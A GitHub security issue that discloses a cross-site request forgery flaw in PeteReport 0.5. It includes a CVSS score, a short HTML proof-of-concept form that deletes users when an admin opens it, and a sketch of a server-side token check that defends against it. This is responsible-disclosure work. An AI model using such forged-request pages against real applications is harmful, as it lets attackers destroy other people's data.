
Security Issue - CSRF (Delete user,product,etc) #34

Closed
@alestorm980


Hi, I am a security researcher at Fluid Attacks. Our security team found a security issue inside PeteReport version 0.5.

Attached below are the links to our responsible disclosure policy.

Bug description

PeteReport Version 0.5 contains a Cross-Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application.

CVSSv3 Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVSSv3 Base Score:

4.3

Steps to reproduce

  1. Create a malicious HTML file with the following content.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <!--Change ID -->
    <form action="https://127.0.0.1/configuration/user/delete/:id">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  2. If an authenticated admin visits the malicious URL, the user with the corresponding ID will be deleted.

Screenshots and files

evidence

delete_user_html

System Information

  • Version: PeteReport Version 0.5.
  • Operating System: Docker.
  • Web Server: nginx.
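
The form in the reproduction steps has no `method` attribute, so the browser submits it as a GET with the admin's session cookie attached. The sketch below is an added example, not part of the original report and not PeteReport's code: it shows the server-side check that refuses such a request, by requiring POST plus a session-bound token on the delete route. The route pattern is taken from the report; `SERVER_KEY`, `issue_csrf_token`, `check_delete_request` and the `csrf_token` field name are assumptions made for illustration.

```python
import hashlib
import hmac
import re
import secrets

# Constructed for this example: a per-deployment secret and the delete route
# from the report (/configuration/user/delete/:id).
SERVER_KEY = secrets.token_bytes(32)
DELETE_ROUTE = re.compile(r"^/configuration/user/delete/(\d+)$")


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session; the application embeds it in its own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_delete_request(method: str, path: str, session_id: str, form: dict):
    """Return (status, reason) for a request aimed at the destructive route."""
    match = DELETE_ROUTE.match(path)
    if match is None:
        return 404, "not a delete route"
    # A state-changing action must not be reachable through GET: a cross-site
    # form without method=, a link or an image tag all send GET with cookies.
    if method.upper() != "POST":
        return 405, "delete requires POST"
    expected = issue_csrf_token(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    # Constant-time comparison; a cross-site page cannot read the token,
    # so a forged POST arrives without it or with a wrong value.
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    return 200, f"user {match.group(1)} deleted"


if __name__ == "__main__":
    sid = "constructed-admin-session"
    path = "/configuration/user/delete/7"
    # Request shape produced by the form in the report: GET, no token.
    print(check_delete_request("GET", path, sid, {}))
    # Cross-site POST without the token.
    print(check_delete_request("POST", path, sid, {}))
    # Request from the application's own form, carrying the session's token.
    print(check_delete_request("POST", path, sid, {"csrf_token": issue_csrf_token(sid)}))
```
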

Labels: bug
